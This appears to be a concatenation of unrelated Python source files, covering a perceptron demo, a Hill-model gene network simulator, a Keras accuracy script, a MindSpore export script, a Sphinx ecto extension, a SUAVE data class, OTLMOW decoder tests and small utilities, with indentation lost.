tempfile.tempdir = RV_TEMP_DIR # no guarantee this will work
make_dir(RV_TEMP_DIR)
finally:
# now, ensure uniqueness for this process
# the host may be running more than one rastervision process
RV_TEMP_DIR = tempfile.mkdtemp()
tempfile.tempdir = RV_TEMP_DIR
print('Temporary directory is: {}'.format(tempfile.tempdir))
|
python
|
import random
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.patches import Rectangle
class Point():
def __init__(self, x, y, label):
self.x = x
self.y = y
self.label = label
def get_x(self):
return self.x
def get_y(self):
return self.y
def get_label(self):
return self.label
class Perceptron():
def __init__(self):
self.W_x = random.uniform(0, 1.0)
self.W_y = random.uniform(0, 1.0)
self.W_b = random.uniform(0, 1.0)
def train(self, collection, adaptive=1):
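        """One pass of the perceptron rule over the collection.

        For each point, compute a = w.x + b and the error e = t - activation(a);
        on a mistake, update w <- w + adaptive * e * x (the bias uses a fixed
        step of e). Returns the percentage of correctly classified points.
        """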
solutions = 0
for point in collection:
a = self.W_x * point.x + self.W_y * \
point.y + self.W_b
#e_i = t_i - y_i
error = point.get_label() - self.activation(a)
if error == 0.0:
solutions += 1
else:
self.W_x += error * point.x * adaptive
self.W_y += error * point.y * adaptive
self.W_b = self.W_b + error
return solutions/len(collection)*100
    def test(self, collection):
solutions = 0
for point in collection:
a = self.W_x * point.x + self.W_y * \
point.y + self.W_b
error = point.get_label() - self.activation(a)
if error == 0.0:
solutions += 1
return solutions/len(collection)*100
def activation(self, a):
if(a >= 0):
return 1
else:
return 0
def randPoint(points_range):
    x = random.randint(points_range[0], points_range[1])
    y = random.randint(points_range[0], points_range[1])
label = 0
if(x <= y):
label = 1
return Point(x, y, label)
def learn(iterations, amount_of_points, debug=False):
points_range = (-50, 50)
points = []
training = []
testing = []
for i in range(0, amount_of_points):
points.append(randPoint(points_range))
cut = int(0.8 * len(points)) # 80% of the list
random.shuffle(points)
training = points[:cut] # first 80% of shuffled list
testing = points[cut:] # last 20% of shuffled list
percept = Perceptron()
trained_iter = None
for i in range(1, iterations+1):
train_output = percept.train(training, adaptive=0.25*(1/i))
#train_output = percept.train(training)
test_output = percept.test(testing)
if debug:
print("Epoch {:2d} Efficiency training {:3.2f}'%' Efficiency tests {:.2f}%".format(
i, train_output, test_output))
if not debug and train_output == 100:
trained_iter = i
break
if trained_iter is None:
trained_iter = iterations+1
return trained_iter
def drawPlot():
tmp = []
for i in range(1, 6):
tmp.append(learn(25, pow(10, i)))
# chart
x = np.arange(5)
labels = (10, 100, 1000, 10000, 100000)
fig, ax = plt.subplots()
plt.title(
"The impact of the number of points on learning")
    # (iteration = the epoch in which 100% training efficiency was achieved)
plt.bar(x, tmp)
plt.xticks(x, labels)
plt.xlabel('Points')
plt.ylabel('Iteration')
    # the perceptron performs worst around 100 points; more points give
    # faster, more stable convergence, while with fewer points the result
    # depends heavily on which points happen to be drawn
plt.show()
if __name__ == "__main__":
# function x = y
learn(25, 100, debug=True)
drawPlot()
|
python
|
import argparse
import sys
import csv
import os
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
FLAGS = None
BATCH = 8000
Gs = 2 # num of dynamic dims
Gin= 2 # num of input signal dims
TIMESTEP = 0.25
time_points = 200
def Hill_model(x,b,K,links):
# x, current input and state [BATCH,Gin+Gs]
# b, max_rate for Hill activation term [BATCH,Gin+Gs,Gs]
    # K, Michaelis constant [BATCH,Gin+Gs, Gs]
# links, network topology +1/0/-1, [Gin+Gs, Gs]
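    # Hill kinetics (n = 2): each activating edge contributes
    # b * x^n / (K^n + x^n) additively, while each inhibiting edge
    # contributes a multiplicative factor K^n / (K^n + x^n) = 1 - f0;
    # non-edges contribute a neutral factor of 1.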
Hill_n = 2
f0 = ((np.reshape(x,[BATCH,Gin+Gs,1]))**Hill_n)/(K**Hill_n+(np.reshape(x,[BATCH,Gin+Gs,1]))**Hill_n) #[BATCH,Gin+Gs,Gs]
f_activation1 = f0*b*np.reshape(links==1,[1,Gin+Gs,Gs])
f_activation2 = np.sum(f_activation1,axis=1) #[BATCH,Gs]
f_inhibition1 = (1-f0)*np.reshape(links==-1,[1,Gin+Gs,Gs]) + np.reshape(links!=-1,[1,Gin+Gs,Gs])
f_inhibition2 = np.prod(f_inhibition1,axis=1) #[BATCH,Gs]
f = (f_activation2)*f_inhibition2 #[BATCH,Gs]
return f
def Hill_model_dynamics(b,K,links):
gamma = 1
## inputs=0, 0
X0 = np.zeros([BATCH,time_points,Gs])
x0 = 0.1*np.ones([BATCH,Gs])
for t0 in range(time_points):
f0 = Hill_model(np.concatenate([np.zeros([BATCH,Gin]),x0],axis=1),b,K,links)
x0 = (1-gamma*TIMESTEP)*x0 + f0*TIMESTEP
X0[:,t0,:] = x0
hit0 = np.var(X0[:,time_points//2:,0],axis=1)<0.002
## inputs=0.8, 0
X1 = np.zeros([BATCH,time_points,Gs])
x1 = 0.1*np.ones([BATCH,Gs])
for t1 in range(time_points):
f1 = Hill_model(np.concatenate([0.8*np.ones([BATCH,1]),np.zeros([BATCH,1]),x1],axis=1),b,K,links)
x1 = (1-gamma*TIMESTEP)*x1 + f1*TIMESTEP
X1[:,t1,:] = x1
grad1= X1[:,time_points//2:,0] - X1[:,(time_points//2-1):-1,0]
hit1 = (np.var(X1[:,time_points//2:,0],axis=1)>0.01) *\
((np.max(grad1,axis=1)*np.min(grad1,axis=1))<-0.001)
## inputs=0, 0.8
X2 = np.zeros([BATCH,time_points,Gs])
x2 = 0.1*np.ones([BATCH,Gs])
for t2 in range(time_points):
f2 = Hill_model(np.concatenate([np.zeros([BATCH,1]),0.8*np.ones([BATCH,1]),x2],axis=1),b,K,links)
x2 = (1-gamma*TIMESTEP)*x2 + f2*TIMESTEP
X2[:,t2,:] = x2
hit2 = (np.mean(X2[:,time_points//2:,0],axis=1)>4*np.mean(X0[:,time_points//2:,0],axis=1)) *\
(np.var(X2[:,time_points//2:,0],axis=1)<0.002)
#hit_ = np.random.rand(BATCH)<0.01 # for debug
hit_ = hit0*hit1*hit2
return X0[hit_,:,:], X1[hit_,:,:], X2[hit_,:,:], hit_
def main(_):
if not os.path.exists(repr(FLAGS.run_num)):
os.mkdir(repr(FLAGS.run_num))
if not os.path.exists(repr(FLAGS.run_num)+'/train'):
os.mkdir(repr(FLAGS.run_num)+'/train')
if not os.path.exists(repr(FLAGS.run_num)+'/para'):
os.mkdir(repr(FLAGS.run_num)+'/para')
# constraints on network connections
links_primary = np.genfromtxt(repr(FLAGS.run_num)+'/links_primary.csv','float',delimiter=',')
N_edges = np.sum(links_primary==1)
topology_writer = csv.writer(open(repr(FLAGS.run_num)+'/all_topologies.csv', 'w'))
for topo_i in range(2**(N_edges)):
links0 = np.array(list(bin(topo_i)[2:]),'float')
if len(links0) < (N_edges):
links0 = np.concatenate([np.zeros(N_edges-len(links0)), links0], axis=0)
links = np.copy(links_primary)
links[links!=0] = (-1)**links0
print('topology#'+repr(topo_i))
print(links)
#topology_writer.writerow(np.int16(np.concatenate([np.reshape(topo_i,[1]),np.reshape(links,[-1])],axis=0)))
        if True:
X0s = []
X1s = []
X2s = []
bs = []
Ks = []
for n in range(20):
b = np.random.exponential(1,[BATCH,Gin+Gs,Gs])
K = np.random.exponential(1,[BATCH,Gin+Gs,Gs])
X0,X1,X2,hit_ = Hill_model_dynamics(b,K,links)
                if len(X0) != 0:
X0s.append(X0[:,:,0])
X1s.append(X1[:,:,0])
X2s.append(X2[:,:,0])
bs.append(b[hit_,:,:]*links_primary)
Ks.append(K[hit_,:,:]*links_primary)
print('step'+repr(n)+', hit '+repr(len(X0[:,0,0])))
            if len(X0s) != 0:
bs_ = np.concatenate(bs,axis=0)
Ks_ = np.concatenate(Ks,axis=0)
parameters = np.concatenate([np.reshape(bs_,[-1,(Gin+Gs)*Gs]),\
np.reshape(Ks_,[-1,(Gin+Gs)*Gs])], axis=1) #[~,2*(Gin+Gs)*Gs]
np.savetxt(repr(FLAGS.run_num)+'/para/topology'+repr(topo_i)+'.csv', parameters, fmt='%.4f', delimiter=',')
topology_writer.writerow(np.int16(np.concatenate([np.reshape(topo_i,[1]),np.reshape(links,[-1])],axis=0)))
X0s_ = np.concatenate(X0s,axis=0)
X1s_ = np.concatenate(X1s,axis=0)
X2s_ = np.concatenate(X2s,axis=0)
plt.subplot(3,1,1)
plt.plot(np.transpose(X0s_),'-')
plt.subplot(3,1,2)
plt.plot(np.transpose(X1s_),'-')
plt.subplot(3,1,3)
plt.plot(np.transpose(X2s_),'-')
plt.savefig(repr(FLAGS.run_num)+'/train/topology'+repr(topo_i))
plt.close()
else:
print('NULL')
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--run_num', type=int, default=3, help='***')
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
|
python
|
from keras.models import load_model
from keras.preprocessing.sequence import pad_sequences
from numpy import mean
from sklearn.metrics import accuracy_score
from classifier_load_data import tokenizer, sequence_length
def prob_to_class(probs):
return [1 if p >= 0.5 else 0 for p in probs]
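# A quick illustration of the 0.5 threshold above (values are illustrative):
#   prob_to_class([0.2, 0.5, 0.9])  ->  [0, 1, 1]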
# Passing in the relative path of the trained HDF5 format model.
def calculate_accuracy(model_path):
# Loading test data.
with open("corpora/resplit/sanitised/dem_test.txt", encoding="utf-8") as f:
dem_test = f.read().split("\n")
with open("corpora/resplit/sanitised/rep_test.txt", encoding="utf-8") as f:
rep_test = f.read().split("\n")
# Establishing padded samples.
dem_samples = pad_sequences(tokenizer.texts_to_sequences(dem_test), maxlen=sequence_length)
rep_samples = pad_sequences(tokenizer.texts_to_sequences(rep_test), maxlen=sequence_length)
# Loading model and running predictions.
model = load_model(model_path)
dem_pred_prob = [p[0] for p in model.predict(x=dem_samples).tolist()]
rep_pred_prob = [p[0] for p in model.predict(x=rep_samples).tolist()]
dem_predictions = prob_to_class(dem_pred_prob)
rep_predictions = prob_to_class(rep_pred_prob)
# Calculating overall accuracy.
dem_acc = accuracy_score([1 for _ in dem_predictions], dem_predictions)
rep_acc = accuracy_score([0 for _ in rep_predictions], rep_predictions)
# Printing results then writing to file.
accuracy = "Democrats: {}\nRepublicans: {}\nAverage: {}\n\n" \
"Mean democrat prediction probability: {}\nMean republican prediction probability: {}\n" \
.format(dem_acc, rep_acc, (dem_acc + rep_acc) / 2, mean(dem_pred_prob), mean(rep_pred_prob))
print(accuracy)
with open(model_path.split(".h5")[0] + "_accuracy.txt", "w") as f:
f.write(accuracy)
|
python
|
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
##############export checkpoint file into air and onnx models#################
python export.py
"""
import argparse
import numpy as np
from mindspore import Tensor, load_checkpoint, load_param_into_net, export, context
from ISyNet.model import ISyNet
PARSER = argparse.ArgumentParser(description="ISyNet export")
PARSER.add_argument("--device_target", type=str, default='Ascend', help="device target")
PARSER.add_argument("--device_id", type=int, default=0, help="device id")
PARSER.add_argument("--jsonFile", type=str, default='./json/ISyNet-N0.json', help="json architecture description")
PARSER.add_argument("--weight_standardization", default=0, type=int, help="weight standardization")
PARSER.add_argument("--lastBN", type=int, default=1, help="last batch norm")
PARSER.add_argument("--batch_size", type=int, default=1, help="batch size")
PARSER.add_argument("--width", type=int, default=224, help="image width")
PARSER.add_argument("--height", type=int, default=224, help="image height")
PARSER.add_argument("--file_name", type=str, default='ISyNet-N0.json', help="output file name")
PARSER.add_argument("--file_format", type=str, default='MINDIR', help="output file format")
PARSER.add_argument("--checkpoint_file_path", type=str, default=None, help="checkpoint")
ARGS = PARSER.parse_args()
context.set_context(mode=context.GRAPH_MODE, device_target=ARGS.device_target)
if ARGS.device_target == "Ascend":
context.set_context(device_id=ARGS.device_id)
def run_export():
"""run export."""
net = ISyNet(num_classes=1001,
json_arch_file_backbone=ARGS.jsonFile,
dropout=0,
weight_standardization=ARGS.weight_standardization,
last_bn=ARGS.lastBN,
dml=0,
evaluate=True)
assert ARGS.checkpoint_file_path is not None, "checkpoint_path is None."
param_dict = load_checkpoint(ARGS.checkpoint_file_path)
load_param_into_net(net, param_dict)
input_arr = Tensor(np.zeros([ARGS.batch_size, 3, ARGS.height, ARGS.width], np.float32))
export(net, input_arr, file_name=ARGS.file_name, file_format=ARGS.file_format)
if __name__ == '__main__':
run_export()
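# Example invocation (the paths and checkpoint name are illustrative assumptions):
#   python export.py --checkpoint_file_path ./ISyNet-N0.ckpt \
#       --jsonFile ./json/ISyNet-N0.json --file_format MINDIR --batch_size 1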
|
python
|
from .schema_base import SchemaBase
|
python
|
# -*- coding: utf-8 -*-
# Copyright (c) 2010, 2011, Sebastian Wiesner <[email protected]>
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Willow Garage BSD License not applicable
__version__ = '0.4.1'
import sys
import shlex
import os
from os import path
from docutils import nodes
from docutils.parsers import rst
from docutils.parsers.rst.directives import flag, unchanged
from sphinx import addnodes
from sphinx.util.osutil import ensuredir
from sphinx.ext.graphviz import graphviz as graphviz_node
import ecto
class ectocell(nodes.Element):
pass
def _slice(value):
parts = [int(v.strip()) for v in value.split(',')]
if len(parts) > 2:
raise ValueError('too many slice parts')
return tuple((parts + [None]*2)[:2])
def make_ectocelldirective(modname, celltype, state, content=None, content_offset=0):
node = ectocell()
contentnode = nodes.paragraph()
    if content is not None:
state.nested_parse(content, content_offset, contentnode)
node.modname = modname
node.celltype = celltype
node.content = contentnode
env = state.document.settings.env
targetid = 'index-%s' % env.new_serialno('index')
targetnode = nodes.target('', '', ids=[targetid, node.modname + "." + node.celltype])
state.document.note_explicit_target(targetnode)
indexnode = addnodes.index()
indexnode['entries'] = ne = []
indexnode['inline'] = False
s = 'Cell; ' + celltype + ' (module ' + modname + ')'
ne.append(('single', s, targetid, s))
modfirstindexarg = celltype + ' (ecto cell in module ' + modname + ')'
ne.append(('single', modfirstindexarg,
targetid, modfirstindexarg))
return [indexnode, targetnode, node]
class EctoCellDirective(rst.Directive):
has_content = True
final_argument_whitespace = True
required_arguments = 2
option_spec = dict(shell=flag, prompt=flag, nostderr=flag,
ellipsis=_slice, extraargs=unchanged)
def run(self):
return make_ectocelldirective(self.arguments[0], self.arguments[1], self.state,
self.content, self.content_offset)
def docize(CellType, content):
d = {}
def is_bp_enum(thing):
return 'Boost.Python.enum' in str(thing.__class__.__bases__)
def gettendril(name, tendrils, isparam):
d = {}
if len(tendrils) == 0:
return nodes.paragraph()
section = nodes.title(text=name)
lst = nodes.bullet_list()
section += lst
for k, v in tendrils:
entry = nodes.list_item()
lst += entry
para = nodes.paragraph()
entry += para
d[k] = dict(doc=v.doc,
type_name = v.type_name,
required = v.required)
if v.has_default:
try:
default = str(v.val)
                except TypeError:
default = '[not visible from python]'
para += [nodes.strong(k, k), nodes.literal('', ' '),
nodes.emphasis('', ' type: '), nodes.literal('', v.type_name + " ")]
para += nodes.literal('', ' ')
if isparam:
if not v.required:
para += nodes.emphasis('', ' not ')
para += nodes.emphasis('', 'required')
para += nodes.literal('', ' ')
if v.has_default:
para += [nodes.emphasis('', " default: "), nodes.literal('', default)]
else:
para += nodes.emphasis('', ' no default value')
try:
if is_bp_enum(v.val):
valpara = nodes.paragraph()
valpara += nodes.emphasis('', 'Legal Values: ')
                    for thevalue, thename in v.val.values.items():
valpara += nodes.literal('', "%s (%d) " % (str(thename), thevalue))
para += valpara
            except TypeError:
pass # didn't convert to python, but okay. maybe v.val was boost::posix_time::ptime or something.
entry += nodes.paragraph('', v.doc)
return section
d['name'] = CellType.__name__
d['short_doc'] = getattr(CellType, 'short_doc','')
cell = nodes.section()
cell += nodes.title(text=CellType.__name__)
cell += content
top = nodes.topic()
cell += top
cell['ids'].append(CellType.__name__)
cell['names'].append(CellType.__name__)
para = nodes.title(text="Brief doc")
para += nodes.paragraph(text=d['short_doc'])
top += para
inst = CellType.inspect()
top += gettendril('Parameters', inst.params, True)
top += gettendril('Inputs', inst.inputs, False)
top += gettendril('Outputs', inst.outputs, False)
return cell
def do_ectocell(app, doctree):
for node in doctree.traverse(ectocell):
c = __import__(node.modname, fromlist=[str(node.celltype)])
if node.celltype not in c.__dict__:
raise RuntimeError("Cell %s not found in module %s" % (node.celltype, str(c)))
new_node = docize(c.__dict__[node.celltype], node.content)
node.replace_self(new_node)
def setup(app):
app.add_directive('ectocell', EctoCellDirective)
app.connect('doctree-read', do_ectocell)
|
python
|
## @ingroup Core
# DiffedData.py
#
# Created: Feb 2015, T. Lukacyzk
# Modified: Feb 2016, T. MacDonald
# Jun 2016, E. Botero
# ----------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------
from copy import deepcopy
from .Container import Container as ContainerBase
from .Data import Data
from .DataOrdered import DataOrdered
import numpy as np
# ----------------------------------------------------------------------
# Config
# ----------------------------------------------------------------------
## @ingroup Core
class Diffed_Data(Data):
""" This is for creating a data new class where a different copy is saved.
This is useful for creating a new configuration of a vehicle.
Assumptions:
N/A
Source:
N/A
"""
def __defaults__(self):
""" A stub for all classes that come later
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
self.tag = 'config'
self._base = Data()
self._diff = Data()
def __init__(self,base=None):
""" Initializes the new Diffed_Data() class through a deepcopy
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
if base is None: base = Data()
self._base = base
this = deepcopy(base) # deepcopy is needed here to build configs - Feb 2016, T. MacDonald
Data.__init__(self,this)
def store_diff(self):
""" Finds the differences and saves them
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
delta = diff(self,self._base)
self._diff = delta
def pull_base(self):
""" Updates the differences
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
try: self._base.pull_base()
except AttributeError: pass
self.update(self._base)
self.update(self._diff)
def __str__(self,indent=''):
""" This function is used for printing the class.
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
try:
args = self._diff.__str__(indent)
args += indent + '_base : ' + self._base.__repr__() + '\n'
args += indent + ' tag : ' + self._base.tag + '\n'
return args
except AttributeError:
return Data.__str__(self,indent)
def finalize(self):
""" This just does a pull_base()
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
        ## don't do this here, it breaks downstream dependencies
# self.store_diff
self.pull_base()
# ----------------------------------------------------------------------
# Config Container
# ----------------------------------------------------------------------
class Container(ContainerBase):
""" A dict-type container with attribute, item and index style access
intended to hold a attribute-accessible list of Data(). This is unordered.
Assumptions:
N/A
Source:
N/A
"""
def append(self,value):
""" Appends the value to the containers
Assumptions:
None
Source:
N/A
Inputs:
self
Outputs:
N/A
Properties Used:
N/A
"""
try: value.store_diff()
except AttributeError: pass
ContainerBase.append(self,value)
def pull_base(self):
""" Updates the differences
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
for config in self:
try: config.pull_base()
except AttributeError: pass
def store_diff(self):
""" Finds the differences and saves them
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
for config in self:
try: config.store_diff()
except AttributeError: pass
def finalize(self):
""" This just does a pull_base()
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
for config in self:
try: config.finalize()
except AttributeError: pass
# ------------------------------------------------------------
# Handle Linking
# ------------------------------------------------------------
Diffed_Data.Container = Container
# ------------------------------------------------------------
# Diffing Function
# ------------------------------------------------------------
def diff(A,B):
""" The magic diff function that makes Diffed_Data() work
Assumptions:
N/A
Source:
N/A
Inputs:
A
B
Outputs:
Result
Properties Used:
N/A
"""
keys = set([])
keys.update( A.keys() )
keys.update( B.keys() )
if isinstance(A,Diffed_Data):
keys.remove('_base')
keys.remove('_diff')
result = type(A)()
result.clear()
for key in keys:
va = A.get(key,None)
vb = B.get(key,None)
if isinstance(va,Data) and isinstance(vb,Data):
sub_diff = diff(va,vb)
if sub_diff:
result[key] = sub_diff
elif isinstance(va,Data) or isinstance(vb,Data):
result[key] = va
elif isinstance(va,DataOrdered) and isinstance(vb,DataOrdered):
sub_diff = diff(va,vb)
if sub_diff:
result[key] = sub_diff
elif isinstance(va,DataOrdered) or isinstance(vb,DataOrdered):
result[key] = va
elif not np.all(va == vb):
result[key] = va
return result
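# A minimal usage sketch of the diff workflow (the attribute names below are
# illustrative assumptions, not part of this module):
#   base = Data(); base.mass = 10.0; base.span = 30.0
#   config = Diffed_Data(base)
#   config.mass = 12.0
#   config.store_diff()   # _diff now holds only the changed key (mass)
#   config.pull_base()    # re-applies the base values, then the stored diff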
|
python
|
import json
from unittest import TestCase
from GeneralTests.EMInfraResponseTestDouble import ResponseTestDouble
from OTLMOW.Facility.FileFormats.EMInfraDecoder import EMInfraDecoder
from OTLMOW.Facility.OTLFacility import OTLFacility
from OTLMOW.OTLModel.Classes.Omvormer import Omvormer
class EMInfraDecoderTests(TestCase):
def test_decodeFirstEntry(self):
responseString = ResponseTestDouble().response
otl_facility = OTLFacility(logfile='', settings_path='C:\\resources\\settings_OTLMOW.json')
decoder = EMInfraDecoder()
first = decoder.decodeGraph(responseString)[0]
with self.subTest("Testing type match"):
self.assertTrue(isinstance(first, Omvormer))
self.assertEqual("https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Omvormer", first.typeURI)
with self.subTest("Testing keuzelijst"):
self.assertEqual("Encoder", first.type)
self.assertEqual("in-gebruik", first.toestand)
with self.subTest("Testing StringField"):
self.assertEqual("ENCA0469", first.naam)
self.assertEqual(None, first.notitie)
with self.subTest("Testing BooleanField"):
self.assertEqual(True, first.isActief)
with self.subTest("Testing Dte"):
self.assertEqual("10.216.10.33", first.ipAdres.waarde)
with self.subTest("Testing Dtc"):
self.assertEqual("AWV", first.assetId.toegekendDoor)
self.assertEqual("0005bafb-838f-47e0-a4e2-20dd120ede6b-b25kZXJkZWVsI09tdm9ybWVy", first.assetId.identificator)
def test_decode_single_entry(self):
responseString = ResponseTestDouble().single_response
otl_facility = OTLFacility(logfile='', settings_path='C:\\resources\\settings_OTLMOW.json')
decoder = EMInfraDecoder()
first = decoder.decodeGraph(responseString)[0]
with self.subTest("Testing type match"):
self.assertEqual("https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Stroomkring", first.typeURI)
with self.subTest("Testing keuzelijst"):
self.assertEqual("in-gebruik", first.toestand)
with self.subTest("Testing StringField"):
self.assertEqual("A10N47.4.K_stroomkring", first.naam)
self.assertEqual(None, first.notitie)
with self.subTest("Testing BooleanField"):
self.assertEqual(True, first.isActief)
with self.subTest("Testing geometry"):
self.assertEqual("POINT Z (101489.3 190526.6 0)", first.geometry)
with self.subTest("Testing Dtc"):
self.assertEqual("AWV", first.assetId.toegekendDoor)
self.assertEqual("000d3091-deca-4714-8f82-d95aace9ea90-b25kZXJkZWVsI1N0cm9vbWtyaW5n", first.assetId.identificator)
def test_trim_jsonld_dict_single_response(self):
responseString = ResponseTestDouble().single_response
dict_obj = json.loads(responseString)
obj = dict_obj["@graph"][0]
decoder = EMInfraDecoder()
result = decoder.trim_json_ld_dict(obj)
expected = {
'@id': 'https://data.awvvlaanderen.be/id/asset/000d3091-deca-4714-8f82-d95aace9ea90-b25kZXJkZWVsI1N0cm9vbWtyaW5n',
'@type': 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Stroomkring',
'assetId': {'identificator': '000d3091-deca-4714-8f82-d95aace9ea90-b25kZXJkZWVsI1N0cm9vbWtyaW5n',
'toegekendDoor': 'AWV'},
'geo:log': [{'geo:bron': 'overerving',
'geo:gaVersie': 'GA_2.2.0',
'geo:geometrie': {'geo:punt': 'POINT Z(101489.3 190526.6 0)'},
'geo:nauwkeurigheid': '',
'geo:niveau': '-1',
'geo:overerving': [{'geo:erfgenaamId': {
'identificator': '000d3091-deca-4714-8f82-d95aace9ea90-b25kZXJkZWVsI1N0cm9vbWtyaW5n',
'toegekendDoor': 'AWV'},
'geo:erflaatId': {
'identificator': 'b59f3b37-fe77-4677-9e7c-e5491319e759-b25kZXJkZWVsI0xhYWdzcGFubmluZ3Nib3Jk',
'toegekendDoor': 'AWV'},
'geo:relatieId': {
'identificator': 'b80e2ca4-123c-46ac-b747-4b6e8075bf78-b25kZXJkZWVsI0JldmVzdGlnaW5n',
'toegekendDoor': 'AWV'}}]}],
'isActief': True,
'loc:geometrie': 'POINT Z(101489.3 190526.6 0)',
'loc:omschrijving': '',
'loc:puntlocatie': {'loc:adres': {'loc:bus': '',
'loc:gemeente': 'Gent',
'loc:nummer': '35',
'loc:postcode': '9051',
'loc:provincie': 'Oost-Vlaanderen',
'loc:straat': 'Luchthavenlaan'},
'loc:bron': '',
'loc:precisie': '',
'loc:puntgeometrie': {'loc:lambert72': {'loc:xcoordinaat': 101489.3,
'loc:ycoordinaat': 190526.6,
'loc:zcoordinaat': 0}},
'loc:weglocatie': {'loc:gemeente': 'Gent',
'loc:ident2': 'A10',
'loc:ident8': 'A0100002',
'loc:referentiepaalAfstand': -9,
'loc:referentiepaalOpschrift': 47.4,
'loc:straatnaam': ''}},
'naam': 'A10N47.4.K_stroomkring',
'notitie': '',
'toestand': 'in-gebruik',
'typeURI': 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Stroomkring'}
self.assertEqual(expected, result)
def test_decode(self):
responseString = ResponseTestDouble().response
decoder = EMInfraDecoder()
lijst = decoder.decodeGraph(responseString)
self.assertEqual(56, len(lijst))
def test_trim_keys_from_ld_notation(self):
decoder = EMInfraDecoder()
with self.subTest("Testing Dtc"):
value = {'DtcIdentificator.toegekendDoor': 'AWV',
'DtcIdentificator.identificator': '0005bafb-838f-47e0-a4e2-20dd120ede6b-b25kZXJkZWVsI09tdm9ybWVy'}
result = decoder.trim_json_ld_dict(value)
expected = {'toegekendDoor': 'AWV', 'identificator': '0005bafb-838f-47e0-a4e2-20dd120ede6b-b25kZXJkZWVsI09tdm9ybWVy'}
self.assertDictEqual(expected, result)
with self.subTest("Testing Boolean"):
value = True
result = decoder.trim_json_ld_dict(value)
expected = True
self.assertEqual(expected, result)
with self.subTest("Testing Kard *"):
value = ["geel", "rood"]
result = decoder.trim_json_ld_dict(value)
expected = ["geel", "rood"]
self.assertListEqual(expected, result)
with self.subTest("Testing Kard * ComplexField"):
value = [
{'DtcExterneReferentie.externReferentienummer': 'extern ref 1', 'DtcExterneReferentie.externePartij': 'extern 1'},
{'DtcExterneReferentie.externReferentienummer': 'extern ref 2', 'DtcExterneReferentie.externePartij': 'extern 2'}]
result = decoder.trim_json_ld_dict(value)
expected = [{'externReferentienummer': 'extern ref 1', 'externePartij': 'extern 1'},
{'externReferentienummer': 'extern ref 2', 'externePartij': 'extern 2'}]
self.assertListEqual(expected, result)
|
python
|
import logging
import pathlib
class Endpoint:
def __init__(self, source_file, addr, port):
self.name = pathlib.Path(source_file).stem
self.addr = addr
self.port = port
def __repr__(self):
return f'{self.name}@{self.addr}:{self.port}'
class EndpointRegistry:
registry = dict()
@classmethod
def get(cls, name):
if name not in cls.registry:
raise Exception(f'the "{name}" endpoint does not exist in the registry')
return cls.registry[name]
@classmethod
def register(cls, server):
endpoint = server._endpoint
logging.debug(f'registering endpoint: {endpoint}')
cls.registry[endpoint.name] = endpoint
return server
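# A minimal usage sketch (the class name, file path and address are
# illustrative assumptions): the registry key is the source file's stem.
#   class ChatServer:
#       _endpoint = Endpoint('servers/chat_server.py', '127.0.0.1', 8000)
#   EndpointRegistry.register(ChatServer)
#   EndpointRegistry.get('chat_server')   # -> chat_server@127.0.0.1:8000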
|
python
|
"""Plugin for emitting ast."""
__all__ = [
"DebugAstOptions",
"DebugAstEmitter",
"debug_ast",
]
from dataclasses import dataclass
from beet import Context, configurable
from beet.core.utils import required_field
from pydantic import BaseModel
from mecha import AstRoot, CompilationDatabase, Mecha, Visitor, rule
class DebugAstOptions(BaseModel):
location: bool = False
def beet_default(ctx: Context):
ctx.require(debug_ast)
